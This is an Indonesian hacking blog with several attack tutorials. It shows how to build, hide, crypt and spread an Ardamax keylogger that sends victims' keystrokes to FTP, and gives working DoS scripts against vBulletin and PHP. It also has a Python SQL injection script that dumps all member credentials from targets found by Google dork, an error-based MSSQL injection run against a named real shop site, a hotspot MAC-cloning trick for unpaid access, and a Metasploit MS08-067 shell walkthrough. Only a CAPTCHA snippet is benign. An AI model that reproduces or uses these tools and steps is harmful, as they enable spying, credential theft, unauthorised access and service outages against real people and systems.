Wednesday, January 12, 2011

Ardamax Keylogger V3.0 Complete Download + Tutorial + Guide

Kali ini saya akan Membahas tentang keylogger dan ada sedikit tips and trick serta cara menginstalnya agar tidak terdeteksi.
Pertama-tama Download Ardamax Keylogger dan Install. Untuk Ardamax Keylogger V3.0 dapat Kalian Dowload Dibawah ok.

Setting UP Keylogger

Setelah Selesai Di install kalian akan melihat Icon kecil di taskbar anda sebelah kanan bawah seperti gambar ini :



Kalian Klik Kanan Pada Icon Ardamax tsb dan masukkan Registration key.




Copy/Paste Registration name dan Registration key from Serial



Habis Kalian Tekan OK maka akan Muncul Top-up Yang menyatakan Kalian telah Sukses Registrasi.



Creating the Keylogger Engine:

Sekarang kalian akan membuat engine keylogger ( mulai berfikir untuk mencari korban :P )ok kita click remote installation.



Press Next...

Maka Kalian akan melihat seperti ini



Jika Kalian ingin menggabungkan Keylogger engine dengan aplikasi yang lain atau file maka click kotak yang bertuliskan 'Append keylogger engine to file or another applitacion' lalu browse file yang ingin kalian gabungkan.



Sekarang kalian Click Additional components dan pilih Installation Package Bilder , seperti screen shoot dibawah ini :



Sekarang kalian Harus menyeting Ardamax Keylogger menjadi Invisibility , pastikan semua box benar" kalian centang , lalu click next.



Nah Setelah itu kalian akan masuk kedalam Security box centang enable lalu masukkin deh password kalian , saran saya sih password yang mudah kalian ingat. Setelah selesai kita click next untuk melanjutkannya kembali.




Nah Sekarang Kalian Harus Memeriksa Update-an Ardamax keylogger kalian.Click Update and next.



Ok Sekarang Kalian Pasti akan di kotak Option Silahkan kalian ikuti Setting seperti di Screenshoot dibawah ini atau kalian bisa setting sesuka kalian untuk Hot keys nya.



Btw Kalian Bisa juga kok membuat Kapan Ardamax Keylogger kalian terhapus dengan sendirinya atau Self Destruction kapan saja kalian mau.



Ok sekarang Kalian Akan di Kotak Control. Centang kotak yang bertuliskan Send logs every
Sekarang Kalian Buat send Log File setiap 20 menit sekali, setelah itu silahkan kalian pilih Delivery Methodnya Ganti dari E-mail Ke FTP Delivery Method.Setelah itu di bagian Include hapus centrangan Screenshots dan Send only if log size exceeds
Setelah itu semua selesai Maka kalian akan melihat seperti Screenshots dibawah ini :



Nah Sekarang Kalian Harus Mempunyai FTP Silahkan Kalian Daftar di DriveHQ.com, FREE online file storage, online sharing, online backup, FTP hosting, SMTP / POP3 email hosting services.,Selanjutnya kalian Masuk ke dalam Online Storage, lalu buat Folder baru yang ber nama Log ( Disini nanti Data Log dari hasil keylogging kalian akan dikirimkan.
Nah Sekarang kembali lagi ke Ardamax Keylogger , Didalam Dalam Kotak FTP host Kalian masukkan ini :
FTP.DriveHQ.com

Nah Sekarang Di Kotak yang bertuliskan Remote FolderKalian Masukkan " Logs "

Nah Sekarang dibagian Username dan Password Kalian Masukkan Username dan Password dari DriveHQ , yang akan terlihat seperti dibawah ini :



Lalu Silahkan Kalian Click Test , Maka Akan muncul Pop up Seperti dibawah ini :



Setelah berhasil , Jangan Sekali" kalian Merubah DriveHQ Password atau username kalian atau menghapus Folder Logs Jika kalian lakukan maka kalian tidak akan mendapatkan logs dari hasil Keylogging kalian.

Setelah kalian click ok kalian akan masuk ke kotak control lagi, kalian harus menghapus centrangan pada kotak yang bertuliskan Enable Screenshots CapturingLalu kalian Click Next.



Nah Setelah itu semua Selesai Kalian dapat merubah nama dan Icon dari Ardamax Keylogger sesuka kalian, seperti gambar dibawah ini :




Setelah kalian selesai me rename dan mengganti Incon kalian Click next.
Maka Kalian Akan melihat Seperti ini :



Silahkan Kalian Click Finish

Setelah kalian Click Finish kalian akan melihat seperti digambar di bawah ini :



Nah Sekarang Keylogger Engine Telah kalian buat. :D

Nah Sekarang Keylogger yang telah kalian buat akan terdeteksi Virus oleh Anti-Virus jadi kalian harus menggabungkan dengan file yang lain lalu kalian encrypt menggunakan crypter.
Ini berarti kalian membuat keylogger kalian makin tidak terdeteksi atau Fully UnDetecable.

Ardamax.Keylogger V 3.0
Click Here


Nah Sekarang Sekarang saya akan memberitahukan sedikit cara penyebarannya.

Spreading

Ok ada banyak cara dalam menyebarkan keylogger.

1. YoutubeDisini banyak sekali Orang Membuat Video Mengenai crack atau apa saja. nah disini lah kesempatan kita untuk menyebarkan Keylogger kita untuk lebih lanjutnya silahkan anda Berkreasi sendiri Sesuai Imajinasi anda.
atau kalian juga bisa masuk ke YouTube - Broadcast Yourself. dan carilah Video yang paling banyak di lihat orang mengenai crack atau apa saja yang memungkinkan orang untuk mencari link buat Men downloadnya.

Sepertinya cukup satu aja Cara spreadingnya dari saya, jila Kalian Membutuhkan cara yang lain silahkan leave ur comments.

Tuesday, January 11, 2011

DDOS Exploit for Vbullitin , PHP ,

Just a few exploits from Inj3ct0r

Vbullitin DoS
# VBulletin 0-day denial of service II


#
#Perl Script
use Socket;
if (@ARGV < 2) { &usage; }
$rand=rand(10);
$host = $ARGV[0];
$dir = $ARGV[1];
$host =~ s/(http://)//eg;
for ($i=0; $i<10; $i++)
{
$user="vbulletin".$rand.$i;
$data = "s=&";
;
$len = length $data;
$foo = "POST ".$dir."index.php HTTP/1.1\r\n".
"Accept: * /*\r\n".
"Accept-Language: en-gb\r\n".
"Content-Type: application/x-www-form-urlencoded\r\n".
"Accept-Encoding: gzip, deflate\r\n".
"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\r\n".
"Host: $host\r\n".
"Content-Length: $len\r\n".
"Connection: Keep-Alive\r\n".
"Cache-Control: no-cache\r\n\r\n".
"$data";
     my $port = "80";
     my $proto = getprotobyname('tcp');

     socket(SOCKET, PF_INET, SOCK_STREAM, $proto);
     connect(SOCKET, sockaddr_in($port, inet_aton($host))) || redo;
     send(SOCKET,"$foo", 0);
     syswrite STDOUT, "Fire";
}
print "nn";
system('ping $host');
sub usage {
print "tusage: n";
print "t$0  n";
print "tex: $0 127.0.0.1 /forum/n";
print "tex2: $0 127.0.0.1 / (if there isn't a dir)nn";
exit();
};
 
###############################################
# Created by SeeMe
# Greetz to In3ct0r.com Team

PHP DoS
]
$junk=str_repeat("99999999999999999999999999999999999999999999999999",99999);
for($i=0;$i<2;){
$buff=bcpow($junk, '3', 2);
$buff=null;
}
//Coded By Pejvak;
?>

Vbullitin DoS 2

[color="#00FF00"][b]import urllib,urllib2,re
[code]print "####################################"
print "#[+]ICW 0-day Domain Crasher #"
print "#[+] Exploit found by Yash [ICW] #"
print "#[+] Exploit Coded by FB1H2S [ICW] #"
print "#[+] Care-Taker d4rk-blu [ICW] #"
print "#[+] Indian Cyber Warriors #"
print "####################################\n"
print "Enter Domain Adress:"
domain=raw_input("[+]Ex: www.site.com:")
url ='http://'+domain+'/misc.php?show=latestposts&vsacb_resnr=10000000'
res = urllib.urlopen(url).read(200)
phpmem= re.findall('of (.*?)bytes.*?',res)
bytes=int(phpmem[0])
mb=bytes/1048576
print '[+]Server php memmory is:'+str(mb)+' MB'
print "[+]Enter the No of request you wann send:"
kill=raw_input("Some 20-30 will be enough:")
try:
for i in range(1,int(kill)):
print i
res1 = urllib.urlopen(url).read(200)
print res1
except(IOError),msg: print "Server will be FCUK'ed by now"
################################################################
C:\Python25>python vbexploit.py
####################################
#[+]ICW 0-day Domain Crasher #
#[+] Bug found by Yash [ICW] #
#[+] Exploit Coded by FB1H2S [ICW] #
#[+] Care-Taker d4rk-blu [ICW] #
#[+] Indian Cyber Warriors #
####################################
 
Enter Domain Adress:
[+]Ex: www.site.com: sitehere
 
[+]Server php memmory is:32 MB
[+]Enter the No of request you wann send:20
1
2
3
Server will be FCUK'ed by now

Tutorial Exploit Payment Processor


This is a tutorial about how to use an exploit from inj3ct0r.com to compromise every username & password on the website.
Ok Let Do it.

As an example, we'll use this one:

http://inj3ct0r.com/exploits/13546

As you can see this is an SQL injection exploit, so you'll have to have a basic understanding of SQL injection (if you don't there are some great guides on this forum, just search).

Now this exploit doesn't give any information about what it does, so we'll have to figure it out. All gives us is a python script.
By taking a look at the script we can see that it takes the target URL as an argument. Then it appends "faq.htm?farea=" + SQL injection

The Injection code prints a username + password from a databse called "dp_members" it surrounds it with triple colons (0x3a3a3a) like:

:::username:::password:::

That's greatl, but how do we find vulnerable targets? Well, by looking at the script we can deduce that this google dork will find some targets for us.

inurl:"faq.htm?farea=" 

Awesome, so now we have got our targets. All that's missing is to improve the script so that instead of getting one username, it get's all of them. This script is written entirely by me, but based on the original exploit script.

Save this code as exploit.py.

import sys, os, urllib2, re

os.system('cls')
os.system('clear')
print "_______________________________________________________________"
print ""
print "           by Blackmygo   [Black-mygo.blogspot.com]              "
print "         Based on http://inj3ct0r.com/exploits/13546             "
print ""
print "_______________________________________________________________"

if len(sys.argv) < 2:
        print "\nWhat website should we exploit? eg: http://target.com/"
        site = raw_input("Address: ")
        
else:   
        site = sys.argv[1]
        
if site[-1:] != "/":
        site += "/"

#:::  configuration     
vfile = "faq.htm"
query = "?farea=-5+union+select+1,concat(0x3a3a3a,username,0x3a,password,0x3a3a3a),3+from+dp_members+limit+"
login = "members/login.htm"
#:::  configuration     


url_attack = site + vfile + query
url_login = site + login
counter = 0
success = True

print "\n" + site
print "Exploiting now..."
print "_______________________________________________________________\n"

while success == True:
        
        limit = str(counter) + ',' + str(counter+1)+'+--'
        try:    
                doc = urllib2.urlopen( url_attack + limit ).read()
        except urllib2.HTTPError:
                print "HTTP Error 403: Forbidden"
                sys.exit(1);
        booty = re.findall(r':::blink:.*):::' , doc )
        
        if len( booty ) > 0:
                print booty[0]
                counter += 1
        else:
                success = False
                print "_______________________________________________________________"
                if counter == 0:
                        print "expliot failed. Try manual injection.\n\n"
                else :
                        print "Retrieved " + str(counter) + " logins. Use them at: " + site + login

Before we do this make sure you turn on your proxy/VPN or whatever you are using to hide your IP.

Now., if you are on Linux / Mac OS X:

chmod +x exploit.py
python exploit.py

Windows:

python exploit.py

it will ask you for your target, use one you found by using your Google dork. Be aware that not all websites listed will be vulnerable, so try a few.

Next, just sit back and watch the magic happen. The plaintext usernames & passwords will go appearing in your terminal. Once the script has dumped the entire members database, it will give you the login URL so you can try them.

Tutorial Hacking Hotspot Mikrotik

1. Download Netcutterlebih dahulu, program ini untuk mengetahui MAC address yang terhubung dengan kita.
2. Koneksikan komputer kita dengan hotspot mikrotik
3. Jalankan program Netcut
4. Pilih LAN Card / NIC yang kita gunakan dengan mengklik menu Choice NetCard



5. Kemudian klik OK kembali ke layar utama, pilih salah satu network yang terkoneksi. Yang jelas bukan network kita atau network server.



6. Salin IP address dan MAC address, bisa juga dengan mengklik PrintTable kemudian blok dan copy paste ke notepad untuk langkah selanjutnya



7. Setelah dipaste di notepad langkah selanjutnya edit nilai MAC address, pada contoh ini [00:26:5E:60:81:1C]. Hilangkan tanda [:] sehingga menjadi 00265E60811C. Nilai ini yang akan kita gunakan untuk merubah MAC address kita.
8. Selanjutnya kita disable dulu wireless LAN kita. Kemudian buka properties wireless LAN dan ubah nilai Local Administration MAC Network, default kosong. Isi dengan nilai tadi, pada contoh ini 00265E60811C



9. Kemudian kita set IP wireless LAN kita dengan IP yang sama yaitu 192.168.182.18 dan isi juga DNS server address.
Untuk DNS server address bisa dicek sebelum kita merubah MAC dan IP. Jadi waktu pertama kali kita terhubung ke hotspot, dengan cara mengetik perintah dari command prompt.

C:\>ipconfig/all



10. Langkah terakhir adalah meng-enable kembali wireless LAN kita. Sekarang kita bisa browsing tanpa harus ijin pada yang punya hotspot.
11. Hasil :
Sebelum melakukan clone



Sesudah melakukan clone



Sekian Dulu Tips Dari Saya.

Tips Mencegah posting spamming


kali ini kita coba mencegah postingan spammer dengan image generator. Sehingga seorang user yang ingin mengirimkan sebuah komentar, harus terlebih dahulu memasukkan kode berupa angka yang tertera didalam gambar.

Beberapa alasan validasi code menggunakan gambar adalah karena jika kita menggunakan text, sebuah bot dapat diprogram untuk membacanya, sekalipun text tersebut adalah sebuah rumus hitung-hitungan. Berbeda dengan gambar yang harus dilihat dan bukan dibaca. Mungkin yang sudah terbiasa menggunakan captcha hal ini tidak perlu dikhawatirkan, tapi buat yang kurang terbiasa menggunakan captcha atau ingin menggunakan codingan sendiri, script berikut bisa dicoba.. ^_^

ok, go to code :

function generateCode(){
global $no_random,$validator;
$im = imagecreatetruecolor(63,28);
$text_color = imagecolorallocate($im, 233, 14, 200);
$no_random = rand(100000,999999);
imagestring($im, 100, 5, 5, $no_random, $text_color);
ob_start();
imagejpeg($im, NULL, 100);
$contents = ob_get_contents();
ob_end_clean();
imagedestroy($im);
$validator = strrev(dechex($no_random));
$fh = fopen("./temp/".$validator.".jpg", "a+" );
fwrite( $fh, $contents );
fclose( $fh );
echo "";
}

script diatas adalah fungsi untuk membuat sebuah kode angka random dalam bentuk gambar. Sehingga jika sebuah bot berusaha untuk menelusuri kode validasi, maka dia hanya akan mendapati sebuah gambar dengan nama random yang juga sudah diconvert. Cara kerja fungsi diatas adalah sebagai berikut:
- menciptakan sebuah angka random ($no_random)
- kemudian mengubahnya menjadi file image beserta ukuran gambar, ukuran font, dan warna font)
- kemudian membuat sebuah variabel "$validator" berisi angka random tadi yang sudah dikonversi, dan tentunya kita buat sedemikian rupa agar bot tidak bisa mendapatkan angka random yang sesuai dengan yang tertera pada gambar. Pola yang kita gunakan disini adalah mengubah nilai Decimal angka random menjadi bilangan Hexa, kemudian dibalik menggunakan fungsi strrev() pada PHP.

Penggunaan fungsi diatas pada sebuah form komentar bisa seperti ini (disesuaikan)

echo "
Tulis Komentar


"; generateCode();
echo "
Masukkan kode diatas :


";

Pada saat proses pengecekkan hasil post, kita harus mengembalikan nilai $validator menjadi nilai awal yang sebenarnya. Caranya tetap sama, yakni dengan me-reverse lagi nilai $validator kemudian mengubah bilangan Hexa tersebut kembali menjadi bilangan Decimal.

if($_POST['submit']){
$msg = $_POST['msg'];
$code = $_POST['code'];
$val = $_POST['validator'];
$getcode = hexdec(strrev($val));
if($code==$getcode){
$input = mysql_query("INSERT INTO tbl_comments
VALUES ('','".$msg."')");
echo "Pesan terkirim";
}else{
echo "Kode yang anda masukkan salah";
}
}

Cara diatas sebenarnya cuma memanfaatkan logika ja, kalo pengen lebih rumit lagi, bisa saja ubah bilangan menjadi Biner, kemudian gunakan fungsi OR,XOR, AND, atau operator logika lainnya, yang penting pastikan bahwa angka random awal yang tertera pada gambar berbeda dengan input kode yang sudah dikonversi, dan susah untuk dipahami, ini didapat darimana... :)

Seperti ini saja tips simple dan sederhana untuk membuat captcha.
Semoga Bermanfaat.
yarp yarp ^_^

Monday, January 10, 2011

Tutorial Hacking Use SQLi/MSSQL




Sebelumnya Saya Mohon Maaf Jaka Para Master" membaca ini, saya cuma ingin Share aja kepada yang belum tahu Caranya hacking Use SQLI/MSSQL.
Ok kita Mulai
Sebagai Contoh saya ada sebuah Website Target:

http://www.bluraydvdonly.com


Ok kita test SQL Injection.

http://www.bluraydvdonly.com/category.asp?catID=20'

Microsoft OLE DB Provider for SQL Server  error '80040e14'

Unclosed quotation mark before the character string '20';'.

/PageData/page.platform.access.asp, line 11

Nah Lo Ternyata MSSQL , ok kita selidiki lebih Lanjut


Kita keluarin pesan error pake perintah convert() untuk dapet version()

http://www.bluraydvdonly.com/category.asp?catID=20' and 1=convert(int,@@version)--

Microsoft OLE DB Provider for SQL Server  error '80040e07'

Syntax error converting the nvarchar value 'Microsoft SQL Server 2000 - 8.00.2055 (Intel X86) Dec 16 2008 19:46:53 Copyright (c) 1988-2003 Microsoft Corporation Developer Edition on Windows NT 5.2 (Build 3790: Service Pack 2) ' to a column of data type int.

/PageData/page.platform.access.asp, line 11

Nah Lo Nongol Versinya
jadi kita memanfaatkan pesan error dari sql server...
karena kita mencoba meng-convert string menjadi integer --> convert(int, inject_here) maka dia akan mengeluarkan pesan error seperti diatas
yuk kita liat liat yg lain lagi.

Check user pake fungsi user_name()

http://www.bluraydvdonly.com/category.asp?catID=20' and 1=convert(int,user_name())--
OR
http://www.bluraydvdonly.com/category.asp?catID=20' and 1=convert(int,user)--


Microsoft OLE DB Provider for SQL Server  error '80040e07'

Syntax error converting the nvarchar value 'dbo' to a column of data type int.

/PageData/page.platform.access.asp, line 11

Check nama database

http://www.bluraydvdonly.com/category.asp?catID=20' and 1=convert(int,db_name())--

Microsoft OLE DB Provider for SQL Server error '80040e07'

Syntax error converting the nvarchar value 'BluerayDVD' to a column of data type int.

/PageData/page.platform.access.asp, line 11

Nah Kita Bisa liat Tuh Nama Data basenya " BluerayDVD "

Kalau mau liat database yg lainnya??? tinggal kasih index di fungsi db_name(index)

http://www.bluraydvdonly.com/category.asp?catID=20' and 1=convert(int,db_name(1))--

http://www.bluraydvdonly.com/category.asp?catID=20' and 1=convert(int,db_name(2))--

dan seterusnya

Nah coba sekarang kita liat isi database yg BluerayDVD.

http://www.bluraydvdonly.com/category.asp?catID=20' and 1=convert(int,(select top 1 table_name from information_schema.tables))--

Microsoft OLE DB Provider for SQL Server  error '80040e07'

Syntax error converting the nvarchar value 'CentinelProcessing' to a column of data type int.

/PageData/page.platform.access.asp, line 11

Tuh table pertama yg kita dapetin namanya CentinelProcessing..
oya karena db_name() --> BluerayDVD artinya BluerayDVD adalah database yg sekarang sedang terkoneksi... jadi kita gak perlu pake ...Where table_catalog=db_name()...
hasilnya sama sih...

http://www.bluraydvdonly.com/category.asp?catID=20' and 1=convert(int,(select top 1 table_name from information_schema.tables where table_catalog=db_name()))--

Klo di mysql biasanya kita pake limit untuk ngeluarin isinya satu persatu..
klo di mssql kita pake --> not in()
coba liat ini,, sama kayak query yg sebelumnya,, cuma ditambah not in()

http://www.bluraydvdonly.com/category.asp?catID=20' and 1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in('CentinelProcessing')))--

Microsoft OLE DB Provider for SQL Server  error '80040e07'

Syntax error converting the nvarchar value 'Cities' to a column of data type int.

/PageData/page.platform.access.asp, line 11

Tuh kita dapet tabel ke-2nya

select top 1 table_name from information_schema.tables where table_name not in('CentinelProcessing'))

Ini klo diterjemahin--> kasih lihat table_name dari tabel `information_schema.tables` dimana table_name bukan CentinelProcessing

lanjut ke table berikutnya,, tadi kan kita dah dapet table ke-2 yaitu Cities

http://www.bluraydvdonly.com/category.asp?catID=20' and 1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in('CentinelProcessing','Cities')))--

Microsoft OLE DB Provider for SQL Server  error '80040e07'

Syntax error converting the nvarchar value 'check_sysuser' to a column of data type int.

/PageData/page.platform.access.asp, line 11

Dapet table check_sysuser .. dah terusin tuh sampe kamu dapet semua nama table atau table yg kamu incerrr..
klo dah gak keluar pesan error berarti tablenya ud semuanya

Liat nama2 column pada sebuah table, misal table CentinelProcessing

http://www.bluraydvdonly.com/category.asp?catID=20' and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name='CentinelProcessing'))--

Microsoft OLE DB Provider for SQL Server  error '80040e07'

Syntax error converting the nvarchar value 'DataKey' to a column of data type int.

/PageData/page.platform.access.asp, line 11

Klo kamu perhatiin kita disini memanfaatkan table2 pada information_schema untuk mendapatkan nama table dan column,, mirip2 kayak injection di mysql versi 5..



Untuk dapetin nama column berikutnya,, sama kyk ngedapetin nama table yaitu pake not in()

http://www.bluraydvdonly.com/category.asp?catID=20' and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name='CentinelProcessing' and column_name not in('DataKey')))--

Microsoft OLE DB Provider for SQL Server  error '80040e07'

Syntax error converting the nvarchar value 'CartID' to a column of data type int.

/PageData/page.platform.access.asp, line 11

Dapet column kedua pada tabel CentinelProcessing --> CartID


Next coluuuuumn...

http://www.bluraydvdonly.com/category.asp?catID=20' and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name='CentinelProcessing' and column_name not in('DataKey','CartID')))--

Microsoft OLE DB Provider for SQL Server  error '80040e07'

Syntax error converting the nvarchar value 'CID' to a column of data type int.

/PageData/page.platform.access.asp, line 11

Truzz sampe gak kluar error brarti dah dapet semuanya...
sekarang kita udah dapet nama table dan column-columnnya, kita bisa lanjut liat isinya...



Mari kita liat isi 'CartID' pada table CentinelProcessing

http://www.bluraydvdonly.com/category.asp?catID=20' and 1=convert(int,(select top 1 CartID from CentinelProcessing))--
Syntax error converting the varchar value 'CSR@TQJWQKT1POG6P4ENBMDGXPNJVT9O697FIR67ELH2DP3HD5' to a column of data type int.

http://www.bluraydvdonly.com/category.asp?catID=20' and 1=convert(int,(select top 1 CartID from CentinelProcessing where CartID not in('CSR@TQJWQKT1POG6P4ENBMDGXPNJVT9O697FIR67ELH2DP3HD5')))--
Syntax error converting the varchar value 'CSR@C63CNXD3BQN78V9DJCW3426MQVHPPZ35YHRMBXZEX1B8W5' to a column of data type int.

http://www.bluraydvdonly.com/category.asp?catID=20' and 1=convert(int,(select top 1 CartID from CentinelProcessing where CartID not in('CSR@TQJWQKT1POG6P4ENBMDGXPNJVT9O697FIR67ELH2DP3HD5','CSR@C63CNXD3BQN78V9DJCW​3426MQVHPPZ35YHRMBXZEX1B8W5')))--
Syntax error converting the varchar value 'CSR@64VB3W6E22SJ2IQZNZPSB2ZV87M2JNKSU4KKRXUFP2HTPJ' to a column of data type int.

dan seterusnya...

Sekian DUlu Dari Saya, Semoga Ini bermanfaat Buat yang Ingin belajar.

Sunday, January 9, 2011

Hacking With Basicly Command Metasploit


Pertama kali kita coba dengan testing manual menggunakan metasploit console (msfconsole) yang mana test ini dilakukan pada single mesin windows xp sp2 dengan melakukan percoban exploit ms windows MS08-067 yaitu vulner pada microsoft windows di port 445, sekarang mungkin udah di pacth deh, tapi masih banyak keknya yang make XP2 bajakan.
jalankan metasploit nya mau di windows ama di linux keknya sama aja deh , Saya nyobanya di ubuntu 9.04 ni.

Blackmygo@ubuntu:~msfconsole
|\/| |¯ ¯|¯ /¯\ |¯  |¯| |  |¯| | ¯|¯ 
|  | |¯  |  |¯|  ¯| |¯  |_ |_| |  |  
      ¯          ¯                 
        =[ msf  v3.3 dev
        =[ 359 exploits - 233 payloads
        =[ 20 encoders 7 nops
        =[ 132 aux
msf > version
Framework : 3.3 dev.6055
Console     : 3.3 dev.6344
msf >

oke awalya ketik in aja help untuk ngeliat bantuan yang ada

msf > help

      Core Commands
      =============

      Command       Description
      -------       -----------
      ?             Help menu
      back          Move back from the current context
      banner        Display an awesome metasploit banner
      cd            Change the current working directory
      connect       Communicate with a host
      exit          Exit the console
      help          Help menu
      info          Displays information about one or more module
      irb           Drop into irb scripting mode
      jobs          Displays and manages jobs
      load          Load a framework plugin
      loadpath      Searches for and loads modules from a path
      quit          Exit the console
      resource      Run the commands stored in a file
      route         Route traffic through a session
      save          Saves the active datastores
      search        Searches module names and descriptions
      sessions      Dump session listings and display information about sessions
      set           Sets a variable to a value
      setg          Sets a global variable to a value
      show          Displays modules of a given type, or all modules
      sleep         Do nothing for the specified number of seconds
      unload        Unload a framework plugin
      unset         Unsets one or more variables
      unsetg        Unsets one or more global variables
      use           Selects a module by name
      version       Show the framework and console library version numbers

Untuk melihat list exploits-nya , gunakan perintah :

msf > show exploits

kira-kira yang keluar seperti inilah, panjang banget soalnya :

windows/smb/ms05_039_pnp              Microsoft Plug and Play Service Overflow
windows/smb/ms06_025_rasmans_reg      Microsoft RRAS Service RASMAN Registry Overflow
windows/smb/ms06_025_rras             Microsoft RRAS Service Overflow
windows/smb/ms06_040_netapi           Microsoft Server Service NetpwPathCanonicalize Overflow
windows/smb/ms06_066_nwapi            Microsoft Services MS06-066 nwapi32.dll
windows/smb/ms06_066_nwwks            Microsoft Services MS06-066 nwwks.dll
windows/smb/ms08_067_netapi           Microsoft Server Service Relative Path Stac

nah kemudian kita harus scan dulu ntu komputer yang mau kita attach
dengan IP 192.168.1.2 kita pake nmap biar lengkap.

msf > sudo nmap -v -sS -A -O 192.168.1.2

Selanjutnya hasilnya keluar seperti ini :

[*] exec: sudo nmap -v -sS -A -O 192.168.1.2
[sudo] password for test:Starting Nmap 4.62 ( http://nmap.org ) at 2010-01-31 23:50 CIT
Initiating ARP Ping Scan at 23:50
Scanning 192.168.1.2 [1 port]
Host 192.168.1.2 appears to be up ... good.
Interesting ports on 192.168.1.2:
Not shown: 1712 closed ports
PORT    STATE SERVICE      VERSION
135/tcp open  msrpc        Microsoft Windows RPC
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds Microsoft Windows XP microsoft-ds
MAC Address: 00:1E:8C:67:59:F9 (Asustek Computer)
Device type: general purpose
Running: Microsoft Windows XP
OS details: Microsoft Windows 2000 SP4, or Windows XP SP2 or SP3
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=258 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: OS: Windows

Dari hasil scan kita ketahui bahwa kemungkinan OS-nya menggunakan OS Windows XP dengan port 445-nya terbuka. Mari kita coba kompi ini dengan menggunakan exploit windows/smb/ms08_067_netapi.

msf > use windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) >

Lihat opsi dari exploit ini dengan mengetikkan show options :

msf exploit(ms08_067_netapi) > show options

Module options:
   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST                     yes       The target address
   RPORT    445              yes       Set the SMB service port
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)  

Exploit target:
   Id  Name
   --  ----
   0   Automatic Targeting

Dari opsi diatas, maka kita perlu set terlebih dahulu RHOST ( komputer target) dengan mengetikkan :

msf exploit(ms08_067_netapi) > set rhost 192.168.1.2
rhost => 192.168.1.2

Untuk RPORT, kita tidak perlu melakukan setting apa-apa karena vulnerability ini memang mengeksploitasi vulnerability di port 445. Untuk exploit target diisi dengan OS komputer target. Dalam langkah ini kita menggunakan angka 0 yang berarti automatic target. Untuk melihat OS target apa saja, ketik :

msf exploit(ms08_067_netapi) > show targets

Exploit targets:
   Id  Name
   --  ----
   0   Automatic Targeting
   1   Windows 2000 Universal
   2   Windows XP SP0/SP1 Universal
   3   Windows XP SP2 English (NX)
   4   Windows XP SP3 English (NX)

Sekarang kita tentukan jenis payload yang ingin dipakai. Dalam langkah ini saya ingin menggunakan tcp_bind shell (akses command prompt di kompi target) :

msf exploit(ms08_067_netapi) > set payload windows/shell_bind_tcp
payloads => windows/shell_bind_tcp

Untuk melihat payload apa saja dalam metasploit, gunakan perintah :

msf exploit(ms08_067_netapi) > show payloads

Compatible payloads
===================
   Name                                            Description
   ----                                            -----------
   generic/debug_trap                Generic x86 Debug Trap
   generic/debug_trap/bind_ipv6_tcp  Generic x86 Debug Trap, Bind TCP Stager (IPv6)
   generic/debug_trap/bind_nonx_tcp  Generic x86 Debug Trap, Bind TCP Stager (No NX Support)
   generic/debug_trap/bind_tcp       Generic x86 Debug Trap, Bind TCP Stager

Nahh.. setting sudah selesai dilakukan. Untuk melihat hasil konfigurasinya bisa dicek kembali dengan menggunakan show options :

msf exploit(ms08_067_netapi) > show options

Module options:
   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST    192.168.1.2      yes       The target address
   RPORT    445              yes       Set the SMB service port
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)  

Payload options (windows/shell_bind_tcp):
   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique: seh, thread, process
   LPORT     4444             yes       The local port
   RHOST     192.168.1.2      no        The target address
Exploit target:
   Id  Name
   --  ----
   0   Automatic Targeting

sekarang jalankan exploit :

msf exploit(ms08_067_netapi) > exploit

[*] Started bind handler
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP Service Pack 2 - lang:English
[*] Selected Target: Windows XP SP2 English (NX)
[*] Triggering the vulnerability...
[*] Command shell session 1 opened (192.168.1.6:33270 -> 192.168.1.2:4444)

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>ipconfig
ipconfig
Windows IP Configuration
Ethernet adapter Local Area Connection:

        Connection-specific DNS Suffix  . :
        IP Address. . . . . . . . . . . . : 192.168.1.2
        Subnet Mask . . . . . . . . . . . : 255.255.255.0
        Default Gateway . . . . . . . . . : 192.168.1.254

C:\WINDOWS\system32>

sekarang kita udah berada di komputer si korban silahkan lakukan yang anda mau.

Sekian dulu dari saya semoga bermanfaat.

Twitter Delicious Facebook Digg Stumbleupon Favorites More

 
Radio Online